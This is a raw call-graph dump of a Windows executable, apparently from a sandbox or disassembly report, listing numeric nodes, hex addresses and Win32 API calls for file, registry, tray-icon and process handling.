3169e9 95334->95337 95335->95332 95340 31627c 8 API calls 95335->95340 95339 3196d9 8 API calls 95337->95339 95338 316a49 95341 316a5f 95338->95341 95346 31be6d 8 API calls 95338->95346 95339->95333 95343 316a21 95340->95343 95343->95332 95351 318685 8 API calls 95343->95351 95344 3184b7 8 API calls 95348 355810 95344->95348 95345->95344 95346->95341 95348->95332 95354 31627c 8 API calls 95348->95354 95456 31acc0 95348->95456 95351->95332 95354->95348 95404 3522f0 95368->95404 95371 3155c5 95418 31bceb 95371->95418 95372 3155aa 95406 3184b7 95372->95406 95375 3155b6 95376 3179ed 8 API calls 95375->95376 95377 3155c2 95376->95377 95377->95281 95379 31bf07 8 API calls 95378->95379 95380 37e96d 95379->95380 95381 31bf07 8 API calls 95380->95381 95382 37e975 95381->95382 95383 31694e 8 API calls 95382->95383 95384 37e984 95383->95384 95385 31694e 8 API calls 95384->95385 95386 37e994 95385->95386 95405 31558b GetFullPathNameW 95404->95405 95405->95371 95405->95372 95407 3184c7 _wcslen 95406->95407 95408 3565bb 95406->95408 95411 318502 95407->95411 95412 3184dd 95407->95412 95409 3196d9 8 API calls 95408->95409 95410 3565c4 95409->95410 95410->95410 95414 33016b 8 API calls 95411->95414 95424 318894 95412->95424 95416 31850e 95414->95416 95415 3184e5 __fread_nolock 95415->95375 95417 33019b 8 API calls 95416->95417 95417->95415 95419 31bd05 95418->95419 95420 31bcf8 95418->95420 95421 33016b 8 API calls 95419->95421 95420->95375 95422 31bd0f 95421->95422 95423 33019b 8 API calls 95422->95423 95423->95420 95425 3188a6 95424->95425 95426 3188ac 95424->95426 95425->95415 95427 33019b 8 API calls 95426->95427 95427->95425 95444 3186f1 95443->95444 95445 318694 95443->95445 95446 3196d9 8 API calls 95444->95446 95445->95444 95447 31869f 95445->95447 95453 3186c2 __fread_nolock 95446->95453 95448 3566b7 95447->95448 95449 3186ba 95447->95449 95450 33016b 8 API calls 95448->95450 95451 318894 8 API calls 95449->95451 95452 3566c1 95450->95452 95451->95453 95453->95338 95457 31acd8 95456->95457 95458 360566 95456->95458 95457->95458 95461 31ace2 95457->95461 95459 33016b 8 API calls 95458->95459 95460 360577 95459->95460 95463 33019b 8 API calls 95460->95463 95462 33019b 8 API calls 95461->95462 95464 31aced __fread_nolock 95461->95464 95462->95464 95463->95464 95464->95348 95482 3522f0 __wsopen_s 95481->95482 95483 37e790 GetShortPathNameW 95482->95483 95484 3184b7 8 API calls 95483->95484 95485 37e7b8 95484->95485 95485->94848 95485->94852 95487 317a65 95486->95487 95488 317a9e 95486->95488 95490 33016b 8 API calls 95487->95490 95489 31be6d 8 API calls 95488->95489 95491 317a78 95488->95491 95489->95491 95490->95491 95491->94853 95493 33016b 8 API calls 95492->95493 95494 3141b8 95493->95494 95494->94861 95496 35587b 95495->95496 95497 316ac6 95495->95497 95498 35588c 95496->95498 95500 3184b7 8 API calls 95496->95500 95502 33016b 8 API calls 95497->95502 95499 31bceb 8 API calls 95498->95499 95501 355896 95499->95501 95500->95498 95501->95501 95503 316ad9 95502->95503 95504 316ae2 95503->95504 95505 316af4 95503->95505 95506 31b25f 8 API calls 95504->95506 95507 31bf07 8 API calls 95505->95507 95508 316aea 95506->95508 95507->95508 95508->94872 95512 33d6be 95509->95512 95513 33d6d5 95512->95513 95514 33d89f 95512->95514 95513->95514 95518 33d740 95513->95518 95540 33f669 20 API calls _free 95514->95540 95516 33d8af 95541 342b7c 26 API calls _strftime 95516->95541 95519 33d764 95518->95519 95526 33d78b 95518->95526 95535 345153 26 API calls 2 library calls 95518->95535 95534 33f669 20 API calls _free 95519->95534 95521 33d868 95521->95519 95524 33d774 95521->95524 95527 33d87b 95521->95527 95522 33d820 95522->95519 95525 33d841 95522->95525 95537 345153 26 API calls 2 library calls 95522->95537 95524->94888 95525->95519 95525->95524 95530 33d857 95525->95530 95526->95519 95533 33d7fd 95526->95533 95536 345153 26 API calls 2 library calls 95526->95536 95539 345153 26 API calls 2 library calls 95527->95539 95538 345153 26 API calls 2 library calls 95530->95538 95533->95521 95533->95522 95534->95524 95535->95526 95536->95533 95537->95525 95538->95524 95539->95524 95540->95516 95541->95524 95543 355985 95542->95543 95544 316e69 CreateFileW 95542->95544 95545 316e88 95543->95545 95546 35598b CreateFileW 95543->95546 95544->95545 95545->94936 95545->94937 95546->95545 95547 3559b3 95546->95547 95606 316bfa 95547->95606 95550 316b27 95549->95550 95563 316b24 messages 95549->95563 95551 316bfa 3 API calls 95550->95551 95550->95563 95552 316b44 95551->95552 95553 316b51 95552->95553 95554 35589b 95552->95554 95556 33019b 8 API calls 95553->95556 95555 32fdc9 3 API calls 95554->95555 95555->95563 95557 316b5d 95556->95557 95558 3141a6 8 API calls 95557->95558 95559 316b67 95558->95559 95612 31b050 95559->95612 95563->94946 95565 316bfa 3 API calls 95564->95565 95567 32fde7 95565->95567 95566 316bfa 3 API calls 95568 32fe08 95566->95568 95567->95566 95568->94926 95570 33019b 8 API calls 95569->95570 95571 317a39 95570->95571 95572 33016b 8 API calls 95571->95572 95573 317a47 95572->95573 95574 32bfbc 95573->95574 95575 32c003 95574->95575 95576 32bfc7 95574->95576 95577 31bceb 8 API calls 95575->95577 95576->95575 95578 32bfd6 95576->95578 95587 37d2ab 95577->95587 95579 32bfeb 95578->95579 95581 32bff8 95578->95581 95619 32c009 95579->95619 95626 37d3b2 12 API calls 95581->95626 95584 37d2da 95584->94940 95585 32bff4 95585->94940 95586 31acc0 8 API calls 95586->95587 95587->95584 95587->95586 95627 37d249 95587->95627 95588->94955 95590 37d4ce 95589->95590 95591 37d4d9 WriteFile 95589->95591 95668 37d3f7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 95590->95668 95591->94954 95593->94909 95595 31b050 2 API calls 95594->95595 95596 3141da 95595->95596 95596->94939 95598 381764 95597->95598 95599 33016b 8 API calls 95598->95599 95600 38176b 95599->95600 95601 381798 95600->95601 95602 381777 95600->95602 95604 33019b 8 API calls 95601->95604 95603 33019b 8 API calls 95602->95603 95605 381780 ___scrt_fastfail 95603->95605 95604->95605 95605->94947 95611 316c11 95606->95611 95607 3558ec SetFilePointerEx 95608 316c98 SetFilePointerEx SetFilePointerEx 95610 316c64 95608->95610 95609 3558db 95609->95607 95610->95545 95611->95607 95611->95608 95611->95609 95611->95610 95613 31b0cb 95612->95613 95617 31b05e 95612->95617 95618 32f13c SetFilePointerEx 95613->95618 95615 316b73 95616 31b09c ReadFile 95616->95615 95616->95617 95617->95615 95617->95616 95618->95617 95620 32c1f1 8 API calls 95619->95620 95621 32c021 95620->95621 95634 31adc1 95621->95634 95625 32c03c 95625->95585 95626->95585 95628 37d253 95627->95628 95629 37d26a 95627->95629 95628->95629 95630 37d259 95628->95630 95631 31b050 2 API calls 95629->95631 95632 31b050 2 API calls 95630->95632 95633 37d263 95631->95633 95632->95633 95633->95587 95648 32feaa 95634->95648 95636 31b050 2 API calls 95639 31add2 95636->95639 95637 31ae07 95637->95625 95640 318774 MultiByteToWideChar 95637->95640 95639->95636 95639->95637 95655 31b0e3 8 API calls __fread_nolock 95639->95655 95641 3187a0 95640->95641 95642 3187e7 95640->95642 95643 33019b 8 API calls 95641->95643 95644 31bceb 8 API calls 95642->95644 95645 3187b5 MultiByteToWideChar 95643->95645 95647 3187db 95644->95647 95656 3187f0 95645->95656 95647->95625 95649 36fe13 95648->95649 95650 32febb 95648->95650 95651 33016b 8 API calls 95649->95651 95650->95639 95652 36fe1d 95651->95652 95653 33019b 8 API calls 95652->95653 95654 36fe32 95653->95654 95655->95639 95657 318803 95656->95657 95658 318884 95656->95658 95657->95658 95668->95591 95670 38a25f 95669->95670 95671 38a345 95669->95671 95672 33016b 8 API calls 95670->95672 95740 38a607 39 API calls 95671->95740 95674 38a266 95672->95674 95675 33019b 8 API calls 95674->95675 95676 38a277 95675->95676 95679 317953 FindCloseChangeNotification 95676->95679 95677 38a2ff 95678 38a422 95677->95678 95682 38a327 95677->95682 95685 38a390 95677->95685 95741 38276a 10 API calls 95678->95741 95681 38a282 95679->95681 95684 31bf07 8 API calls 95681->95684 95682->94959 95683 38a429 95689 37d4bf 4 API calls 95683->95689 95686 38a28a 95684->95686 95687 318e70 56 API calls 95685->95687 95688 317953 FindCloseChangeNotification 95686->95688 95698 38a397 95687->95698 95690 38a291 95688->95690 95714 38a405 95689->95714 95692 318e70 56 API calls 95690->95692 95691 38a418 95720 37d517 95691->95720 95693 38a29d 95692->95693 95696 317953 FindCloseChangeNotification 95693->95696 95694 38a3cb 95697 317a14 8 API calls 95694->95697 95699 38a2a7 95696->95699 95700 38a3db 95697->95700 95698->95691 95698->95694 95702 316e52 5 API calls 95699->95702 95703 38a3eb 95700->95703 95706 31be6d 8 API calls 95700->95706 95701 317953 FindCloseChangeNotification 95704 38a47b 95701->95704 95705 38a2b6 95702->95705 95707 3165a4 8 API calls 95703->95707 95708 317923 FindCloseChangeNotification 95704->95708 95709 38a2ba 95705->95709 95710 38a31f 95705->95710 95706->95703 95711 38a3f9 95707->95711 95708->95682 95715 316b12 13 API calls 95709->95715 95712 317923 FindCloseChangeNotification 95710->95712 95713 37d517 16 API calls 95711->95713 95712->95682 95713->95714 95714->95682 95714->95701 95716 38a2c8 95715->95716 95739 316afb SetFilePointerEx SetFilePointerEx SetFilePointerEx 95716->95739 95718 38a2cf 95718->95677 95719 37d4bf 4 API calls 95718->95719 95719->95677 95721 37d58e 95720->95721 95722 37d52a 95720->95722 95723 37d4bf 4 API calls 95721->95723 95722->95721 95724 37d52f 95722->95724 95738 37d576 95723->95738 95725 37d582 95724->95725 95726 37d539 95724->95726 95749 37d5ac 12 API calls messages 95725->95749 95728 37d558 95726->95728 95730 37d543 95726->95730 95747 32c170 8 API calls 95728->95747 95745 32c170 8 API calls 95730->95745 95731 37d560 95748 37d44d 10 API calls 95731->95748 95733 37d54b 95746 32f9e2 10 API calls 95733->95746 95736 37d556 95742 37d4fb 95736->95742 95738->95714 95739->95718 95740->95677 95741->95683 95743 37d4bf 4 API calls 95742->95743 95744 37d50d 95743->95744 95744->95738 95745->95733 95746->95736 95747->95731 95748->95736 95749->95738 95751 318e70 56 API calls 95750->95751 95752 3988ed 95751->95752 95754 398932 messages 95752->95754 95788 399632 95752->95788 95754->94967 95755 398dac 95854 399843 63 API calls 95755->95854 95758 398dbb 95759 398bec 95758->95759 95760 398dc7 95758->95760 95801 3987e3 95759->95801 95760->95754 95761 318e70 56 API calls 95776 3989a6 95761->95776 95766 398c25 95814 330000 95766->95814 95769 398c5f 95818 317d51 95769->95818 95770 398c45 95853 383ef6 62 API calls __wsopen_s 95770->95853 95773 398bde 95773->95755 95773->95759 95775 398c50 GetCurrentProcess TerminateProcess 95775->95769 95776->95754 95776->95761 95776->95773 95851 374a0c 8 API calls __fread_nolock 95776->95851 95852 398e7c 41 API calls _strftime 95776->95852 95789 31c269 8 API calls 95788->95789 95790 39964d CharLowerBuffW 95789->95790 95855 3796e3 95790->95855 95794 31bf07 8 API calls 95795 399689 95794->95795 95796 318685 8 API calls 95795->95796 95797 39969d 95796->95797 95798 3196d9 8 API calls 95797->95798 95800 3996a7 _wcslen 95798->95800 95799 3997bd _wcslen 95799->95776 95800->95799 95862 398e7c 41 API calls _strftime 95800->95862 95802 3987fe 95801->95802 95803 398849 95801->95803 95804 33019b 8 API calls 95802->95804 95807 3999f5 95803->95807 95805 398820 95804->95805 95805->95803 95806 33016b 8 API calls 95805->95806 95806->95805 95808 399c0a messages 95807->95808 95812 399a19 _strcat _wcslen ___std_exception_copy 95807->95812 95808->95766 95809 31c92d 39 API calls 95809->95812 95810 31c9fb 41 API calls 95810->95812 95811 318e70 56 API calls 95811->95812 95812->95808 95812->95809 95812->95810 95812->95811 95863 37f7da 10 API calls _wcslen 95812->95863 95815 330015 95814->95815 95816 3300ad ResumeThread 95815->95816 95817 33007b 95815->95817 95816->95817 95817->95769 95817->95770 95819 317d59 95818->95819 95820 33016b 8 API calls 95819->95820 95821 317d67 95820->95821 95864 318386 95821->95864 95824 3183b0 95867 31c700 95824->95867 95851->95776 95852->95776 95853->95775 95854->95758 95857 379703 _wcslen 95855->95857 95856 3797f2 95856->95794 95856->95800 95857->95856 95858 379738 95857->95858 95859 3797f7 95857->95859 95858->95856 95860 32e2e5 41 API calls 95858->95860 95859->95856 95861 32e2e5 41 API calls 95859->95861 95860->95858 95861->95859 95862->95799 95863->95812 95865 33016b 8 API calls 95864->95865 95866 317d6f 95865->95866 95866->95824 95883 31bceb 8 API calls 95882->95883 95884 39d6bf 95883->95884 95885 31bceb 8 API calls 95884->95885 95886 39d6c7 95885->95886 95887 31bceb 8 API calls 95886->95887 95888 39d6cf 95887->95888 95889 39d737 95888->95889 95890 31627c 8 API calls 95888->95890 95891 31bceb 8 API calls 95889->95891 95892 39d6e5 95890->95892 95895 39d735 95891->95895 95892->95889 95893 31627c 8 API calls 95892->95893 95894 39d6f7 95893->95894 95894->95889 95897 39d6fc 95894->95897 95896 318685 8 API calls 95895->95896 95899 39d760 95896->95899 95898 3196d9 8 API calls 95897->95898 95903 39d707 95898->95903 95900 318685 8 API calls 95899->95900 95901 39d777 95900->95901 95902 3179ed 8 API calls 95901->95902 95904 39d780 95902->95904 95905 318685 8 API calls 95903->95905 95904->94993 95906 39d728 95905->95906 95907 3196d9 8 API calls 95906->95907 95907->95895 95909 31c269 8 API calls 95908->95909 95910 39d30e CharUpperBuffW 95909->95910 95911 39d329 95910->95911 95912 31bf07 8 API calls 95911->95912 95913 39d334 95912->95913 95914 318685 8 API calls 95913->95914 95915 39d347 _wcslen 95914->95915 95952 3801bf 95932->95952 95935 380308 95959 3804fe 60 API calls __fread_nolock 95935->95959 95936 380320 95937 380386 95936->95937 95939 380330 95936->95939 95940 3803bb 95937->95940 95941 3803e6 95937->95941 95947 3802ae __fread_nolock 95937->95947 95942 380368 95939->95942 95960 38276a 10 API calls 95939->95960 95940->95947 95963 31c9fb 41 API calls 95940->95963 95941->95947 95964 31c9fb 41 API calls 95941->95964 95944 381759 8 API calls 95942->95944 95944->95947 95947->95072 95948 38033c 95961 38276a 10 API calls 95948->95961 95950 380353 __fread_nolock 95962 38276a 10 API calls 95950->95962 95953 38020c 95952->95953 95957 3801d0 95952->95957 95954 31c92d 39 API calls 95953->95954 95958 38020a 95954->95958 95955 318e70 56 API calls 95955->95957 95956 334db8 _strftime 40 API calls 95956->95957 95957->95955 95957->95956 95957->95958 95958->95935 95958->95936 95958->95947 95959->95947 95960->95948 95961->95950 95962->95942 95963->95947 95964->95947 95966 31bf07 8 API calls 95965->95966 95967 379b6d 95966->95967 95968 317a14 8 API calls 95967->95968 95969 379b81 95968->95969 95970 3796e3 41 API calls 95969->95970 95976 379ba3 95969->95976 95972 379b9d 95970->95972 95971 3796e3 41 API calls 95971->95976 95974 318685 8 API calls 95972->95974 95972->95976 95973 318685 8 API calls 95973->95976 95974->95976 95975 317af4 8 API calls 95975->95976 95976->95971 95976->95973 95976->95975 95977 379c42 95976->95977 95980 379c26 95976->95980 95978 31be6d 8 API calls 95977->95978 95979 379c51 95977->95979 95978->95979 95979->95119 95981 318685 8 API calls 95980->95981 95982 379c36 95981->95982 95983 317af4 8 API calls 95982->95983 95983->95977 95985 321966 95984->95985 95986 3219de 95984->95986 95988 321973 95985->95988 95989 366b04 95985->95989 95987 3669f1 95986->95987 96002 3219ed 95986->96002 95991 3669fc 95987->95991 95992 366af8 95987->95992 95997 366b28 95988->95997 95998 32197d 95988->95998 96061 3984db 216 API calls 2 library calls 95989->96061 96059 32b2d6 216 API calls 95991->96059 96060 383ef6 62 API calls __wsopen_s 95992->96060 95993 3202f0 216 API calls 95993->96002 95996 366b59 95999 366b86 95996->95999 96000 366b64 95996->96000 95997->95996 96001 366b40 95997->96001 96006 31be6d 8 API calls 95998->96006 96041 321990 messages 95998->96041 96011 366c25 95999->96011 96021 366bac 95999->96021 96063 3984db 216 API calls 2 library calls 96000->96063 96062 383ef6 62 API calls __wsopen_s 96001->96062 96002->95993 96003 36691d 96002->96003 96005 321b65 96002->96005 96009 3668ac 96002->96009 96017 321b59 96002->96017 96025 321aa4 96002->96025 96002->96041 96058 383ef6 62 API calls __wsopen_s 96003->96058 96005->94631 96006->96041 96057 383ef6 62 API calls __wsopen_s 96009->96057 96010 366d7d 96013 366db3 96010->96013 96071 3980ce 69 API calls 96010->96071 96065 3819ed 8 API calls 96011->96065 96015 31b3fe 8 API calls 96013->96015 96039 3219d3 messages 96015->96039 96016 31be6d 8 API calls 96016->96041 96017->96005 96056 383ef6 62 API calls __wsopen_s 96017->96056 96018 318e70 56 API calls 96031 366d63 _wcslen 96018->96031 96019 366d91 96022 318e70 56 API calls 96019->96022 96064 3813a0 8 API calls 96021->96064 96036 366d99 _wcslen 96022->96036 96024 366c37 96066 31bc9b 96024->96066 96025->96017 96026 321c50 8 API calls 96025->96026 96030 321b05 96026->96030 96027 3668c1 messages 96027->96003 96037 321b12 messages 96027->96037 96027->96039 96030->96017 96030->96037 96031->96010 96034 31b3fe 8 API calls 96031->96034 96032 366bd6 96035 322ad0 216 API calls 96032->96035 96033 366c40 96070 3813a0 8 API calls 96033->96070 96034->96010 96035->96041 96036->96013 96038 31b3fe 8 API calls 96036->96038 96037->96016 96037->96039 96037->96041 96038->96013 96039->94631 96041->96010 96041->96018 96041->96039 96043 321e1d messages 96042->96043 96044 3224c2 96043->96044 96046 3677db 96043->96046 96047 32e29c 8 API calls 96043->96047 96049 321fa7 messages 96043->96049 96051 36760f 96043->96051 96044->96049 96074 32bd82 41 API calls 96044->96074 96046->96049 96073 33d2f5 41 API calls 96046->96073 96047->96043 96049->94631 96072 33d2f5 41 API calls 96051->96072 96052->94635 96053->94630 96054->94630 96055->94630 96056->96039 96057->96027 96058->96041 96059->96037 96060->95989 96061->96041 96062->96039 96063->96041 96064->96032 96065->96024 96069 31bcab 96066->96069 96067 33016b 8 API calls 96068 31bcbe 96067->96068 96068->96033 96069->96067 96070->96041 96071->96019 96072->96051 96073->96049 96074->96049 96075 31f470 96078 329fa5 96075->96078 96077 31f47c 96079 329fc6 96078->96079 96085 32a023 96078->96085 96080 3202f0 216 API calls 96079->96080 96079->96085 96084 329ff7 96080->96084 96082 36800f 96082->96082 96083 32a067 96083->96077 96084->96083 96084->96085 96086 31be6d 8 API calls 96084->96086 96085->96083 96087 383ef6 62 API calls __wsopen_s 96085->96087 96086->96085 96087->96082 96088 311033 96093 316686 96088->96093 96092 311042 96094 31bf07 8 API calls 96093->96094 96095 3166f4 96094->96095 96101 3155cc 96095->96101 96098 316791 96099 311038 96098->96099 96104 3168e6 8 API calls __fread_nolock 96098->96104 96100 330433 29 API calls __onexit 96099->96100 96100->96092 96105 3155f8 96101->96105 96104->96098 96106 3155eb 96105->96106 96107 315605 96105->96107 96106->96098 96107->96106 96108 31560c RegOpenKeyExW 96107->96108 96108->96106 96109 315626 RegQueryValueExW 96108->96109 96110 315647 96109->96110 96111 31565c RegCloseKey 96109->96111 96110->96111 96111->96106 96112 3655f4 96121 32e34f 96112->96121 96114 36560a 96116 365685 96114->96116 96130 32a9e5 9 API calls 96114->96130 96118 36617b 96116->96118 96132 383ef6 62 API calls __wsopen_s 96116->96132 96119 365665 96119->96116 96131 382393 8 API calls 96119->96131 96122 32e370 96121->96122 96123 32e35d 96121->96123 96125 32e3a3 96122->96125 96126 32e375 96122->96126 96124 31b3fe 8 API calls 96123->96124 96129 32e367 96124->96129 96128 31b3fe 8 API calls 96125->96128 96127 33016b 8 API calls 96126->96127 96127->96129 96128->96129 96129->96114 96130->96119 96131->96116 96132->96118 96133 32f9b1 96134 32f9bb 96133->96134 96135 32f9dc 96133->96135 96142 31c34b 96134->96142 96141 36fadc 96135->96141 96150 3755d9 8 API calls messages 96135->96150 96137 32f9cb 96139 31c34b 8 API calls 96137->96139 96140 32f9db 96139->96140 96143 31c359 96142->96143 96149 31c381 messages 96142->96149 96144 31c367 96143->96144 96145 31c34b 8 API calls 96143->96145 96146 31c36d 96144->96146 96147 31c34b 8 API calls 96144->96147 96145->96144 96148 31c780 8 API calls 96146->96148 96146->96149 96147->96146 96148->96149 96149->96137 96150->96135 96151 330779 96156 330d65 SetUnhandledExceptionFilter 96151->96156 96153 33077e pre_c_initialization 96157 335339 96153->96157 96155 330789 96156->96153 96158 335345 96157->96158 96159 33535f 96157->96159 96158->96159 96164 33f669 20 API calls _free 96158->96164 96159->96155 96161 33534f 96165 342b7c 26 API calls _strftime 96161->96165 96163 33535a 96163->96155 96164->96161 96165->96163 96166 31367c 96169 313696 96166->96169 96170 3136ad 96169->96170 96171 313711 96170->96171 96172 3136b2 96170->96172 96173 31370f 96170->96173 96177 313717 96171->96177 96178 353dce 96171->96178 96174 31378b PostQuitMessage 96172->96174 96175 3136bf 96172->96175 96176 3136f6 DefWindowProcW 96173->96176 96182 313690 96174->96182 96179 3136ca 96175->96179 96180 353e3b 96175->96180 96176->96182 96183 313743 SetTimer RegisterWindowMessageW 96177->96183 96184 31371e 96177->96184 96225 312f24 10 API calls 96178->96225 96185 313795 96179->96185 96186 3136d4 96179->96186 96230 37c80c 68 API calls ___scrt_fastfail 96180->96230 96183->96182 96187 31376c CreatePopupMenu 96183->96187 96190 313727 KillTimer 96184->96190 96191 353d6f 96184->96191 96214 32fcbb 96185->96214 96192 353e20 96186->96192 96193 3136df 96186->96193 96187->96182 96189 353def 96226 32f1c6 40 API calls 96189->96226 96221 31388e Shell_NotifyIconW ___scrt_fastfail 96190->96221 96197 353d74 96191->96197 96198 353daa MoveWindow 96191->96198 96192->96176 96229 371367 8 API calls 96192->96229 96200 313779 96193->96200 96201 3136ea 96193->96201 96194 353e4d 96194->96176 96194->96182 96202 353d99 SetFocus 96197->96202 96203 353d7a 96197->96203 96198->96182 96223 3137a6 78 API calls ___scrt_fastfail 96200->96223 96201->96176 96227 31388e Shell_NotifyIconW ___scrt_fastfail 96201->96227 96202->96182 96203->96201 96208 353d83 96203->96208 96204 31373a 96222 31572c DeleteObject DestroyWindow 96204->96222 96224 312f24 10 API calls 96208->96224 96209 313789 96209->96182 96212 353e14 96228 3138f2 63 API calls ___scrt_fastfail 96212->96228 96215 32fd59 96214->96215 96216 32fcd3 ___scrt_fastfail 96214->96216 96215->96182 96231 315f59 96216->96231 96218 32fd42 KillTimer SetTimer 96218->96215 96219 32fcfa 96219->96218 96220 36fdcb Shell_NotifyIconW 96219->96220 96220->96218 96221->96204 96222->96182 96223->96209 96224->96182 96225->96189 96226->96201 96227->96212 96228->96173 96229->96173 96230->96194 96232 315f76 96231->96232 96233 316058 96231->96233 96234 317a14 8 API calls 96232->96234 96233->96219 96235 315f84 96234->96235 96236 315f91 96235->96236 96237 355101 LoadStringW 96235->96237 96238 3184b7 8 API calls 96236->96238 96240 35511b 96237->96240 96239 315fa6 96238->96239 96241 315fb3 96239->96241 96246 355137 96239->96246 96243 31be6d 8 API calls 96240->96243 96248 315fd9 ___scrt_fastfail 96240->96248 96241->96240 96242 315fbd 96241->96242 96244 3165a4 8 API calls 96242->96244 96243->96248 96245 315fcb 96244->96245 96247 317af4 8 API calls 96245->96247 96246->96248 96250 31bf07 8 API calls 96246->96250 96251 35517a 96246->96251 96247->96248 96249 31603e Shell_NotifyIconW 96248->96249 96249->96233 96252 355161 96250->96252 96262 32fe8f 54 API calls 96251->96262 96261 37a265 9 API calls 96252->96261 96255 35516c 96257 317af4 8 API calls 96255->96257 96256 355199 96258 3165a4 8 API calls 96256->96258 96257->96251 96259 3551aa 96258->96259 96260 3165a4 8 API calls 96259->96260 96260->96248 96261->96255 96262->96256 96263 3664f9 96264 33016b 8 API calls 96263->96264 96265 366500 96264->96265 96266 366519 __fread_nolock 96265->96266 96267 33019b 8 API calls 96265->96267 96268 33019b 8 API calls 96266->96268 96267->96266 96269 36653e 96268->96269 96270 3527a2 96273 312a52 96270->96273 96274 312a91 mciSendStringW 96273->96274 96275 3539f4 DestroyWindow 96273->96275 96276 312d08 96274->96276 96277 312aad 96274->96277 96287 353a00 96275->96287 96276->96277 96279 312d17 UnregisterHotKey 96276->96279 96278 312abb 96277->96278 96277->96287 96305 312e70 96278->96305 96279->96276 96281 353a45 96286 353a58 FreeLibrary 96281->96286 96288 353a69 96281->96288 96282 353a1e FindClose 96282->96287 96284 317953 FindCloseChangeNotification 96284->96287 96285 312ad0 96285->96288 96292 312ade 96285->96292 96286->96281 96287->96281 96287->96282 96287->96284 96289 353a7d VirtualFree 96288->96289 96294 312b4b 96288->96294 96289->96288 96290 312b3a OleUninitialize 96290->96294 96291 353ac5 96297 353ad4 messages 96291->96297 96311 383c45 6 API calls messages 96291->96311 96292->96290 96294->96291 96295 312b56 96294->96295 96309 312f86 VirtualFreeEx CloseHandle 96295->96309 96301 353b63 96297->96301 96312 376d63 8 API calls messages 96297->96312 96299 312b7c 96299->96297 96300 312c61 96299->96300 96300->96301 96302 312caf 96300->96302 96301->96301 96302->96301 96310 312eb8 CloseHandle InternetCloseHandle InternetCloseHandle WaitForSingleObject 96302->96310 96304 312d03 96307 312e7d 96305->96307 96306 312ac2 96306->96281 96306->96285 96307->96306 96313 3778b9 8 API calls 96307->96313 96309->96299 96310->96304 96311->96291 96312->96297 96313->96307 96314 320e6f 96315 320e83 96314->96315 96321 3213d5 96314->96321 96316 33016b 8 API calls 96315->96316 96319 320e95 96315->96319 96316->96319 96317 3655d0 96347 381a29 8 API calls 96317->96347 96318 31b3fe 8 API calls 96318->96319 96319->96317 96319->96318 96320 320eee 96319->96320 96323 322ad0 216 API calls 96320->96323 96338 32044d messages 96320->96338 96321->96319 96324 31be6d 8 API calls 96321->96324 96341 320326 messages 96323->96341 96324->96319 96325 3662cf 96351 383ef6 62 API calls __wsopen_s 96325->96351 96326 321e00 42 API calls 96326->96341 96327 321645 96333 31be6d 8 API calls 96327->96333 96327->96338 96328 320a5e messages 96349 383ef6 62 API calls __wsopen_s 96328->96349 96329 33016b 8 API calls 96329->96341 96331 365c7f 96337 31be6d 8 API calls 96331->96337 96331->96338 96332 3661fe 96350 383ef6 62 API calls __wsopen_s 96332->96350 96333->96338 96336 321940 216 API calls 96336->96341 96337->96338 96339 31be6d 8 API calls 96339->96341 96340 31bf07 8 API calls 96340->96341 96341->96325 96341->96326 96341->96327 96341->96328 96341->96329 96341->96331 96341->96332 96341->96336 96341->96338 96341->96339 96341->96340 96342 330433 29 API calls pre_c_initialization 96341->96342 96343 3305d2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96341->96343 96344 3660b9 96341->96344 96346 330588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96341->96346 96342->96341 96343->96341 96348 383ef6 62 API calls __wsopen_s 96344->96348 96346->96341 96347->96338 96348->96328 96349->96338 96350->96338 96351->96338 96352 36176b 96353 361782 96352->96353 96355 31d250 96353->96355 96356 383ef6 62 API calls __wsopen_s 96353->96356 96355->96355 96356->96355 96357 3215af 96358 32e34f 8 API calls 96357->96358 96359 3215c5 96358->96359 96364 32e3b3 96359->96364 96361 3215ef 96376 383ef6 62 API calls __wsopen_s 96361->96376 96363 3661ab 96365 317a14 8 API calls 96364->96365 96366 32e3ea 96365->96366 96367 31b25f 8 API calls 96366->96367 96370 32e41b 96366->96370 96368 36e4e4 96367->96368 96369 317af4 8 API calls 96368->96369 96371 36e4ef 96369->96371 96370->96361 96377 32e73b 39 API calls 96371->96377 96373 36e502 96374 31b3fe 8 API calls 96373->96374 96375 36e506 96373->96375 96374->96375 96375->96375 96376->96363 96377->96373 96378 361a68 96379 361a70 96378->96379 96382 31d4e5 96378->96382 96416 3779af 8 API calls __fread_nolock 96379->96416 96381 361a82 96417 377928 8 API calls __fread_nolock 96381->96417 96385 33016b 8 API calls 96382->96385 96384 361aac 96387 3202f0 216 API calls 96384->96387 96386 31d539 96385->96386 96408 31c2cd 96386->96408 96388 361ad3 96387->96388 96390 361ae7 96388->96390 96418 3960a2 57 API calls _wcslen 96388->96418 96393 33016b 8 API calls 96405 31d61e messages 96393->96405 96394 361b04 96394->96382 96419 3779af 8 API calls __fread_nolock 96394->96419 96396 31c34b 8 API calls 96406 31d95c messages 96396->96406 96397 31be6d 8 API calls 96397->96405 96398 31b3fe 8 API calls 96398->96405 96400 361f1c 96420 3755d9 8 API calls messages 96400->96420 96401 361f37 96403 31c34b 8 API calls 96403->96405 96404 31d8c1 messages 96404->96396 96404->96406 96405->96397 96405->96398 96405->96400 96405->96401 96405->96403 96405->96404 96407 31d973 96406->96407 96415 32e284 8 API calls messages 96406->96415 96412 31c2dd 96408->96412 96409 31c2e5 96409->96393 96410 33016b 8 API calls 96410->96412 96411 31bf07 8 API calls 96411->96412 96412->96409 96412->96410 96412->96411 96413 31c2cd 8 API calls 96412->96413 96414 31be6d 8 API calls 96412->96414 96413->96412 96414->96412 96415->96406 96416->96381 96417->96384 96418->96394 96419->96394 96420->96401 96421 31b810 96430 3191c7 96421->96430 96423 31b84b 96425 31bb3d 8 API calls 96423->96425 96424 31b821 96424->96423 96426 31bc9b 8 API calls 96424->96426 96429 31b60e 96425->96429 96427 31b83f 96426->96427 96438 31bb3d 96427->96438 96431 31bceb 8 API calls 96430->96431 96432 3191d6 96431->96432 96433 356bfc 96432->96433 96435 31acc0 8 API calls 96432->96435 96436 319224 96432->96436 96446 379f71 64 API calls __wsopen_s 96433->96446 96435->96432 96436->96424 96437 356c0a 96439 31bbc7 96438->96439 96445 31bb4d __fread_nolock 96438->96445 96442 33019b 8 API calls 96439->96442 96440 33016b 8 API calls 96441 31bb54 96440->96441 96443 33016b 8 API calls 96441->96443 96444 31bb72 96441->96444 96442->96445 96443->96444 96444->96423 96445->96440 96446->96437 96447 330456 96469 33047d 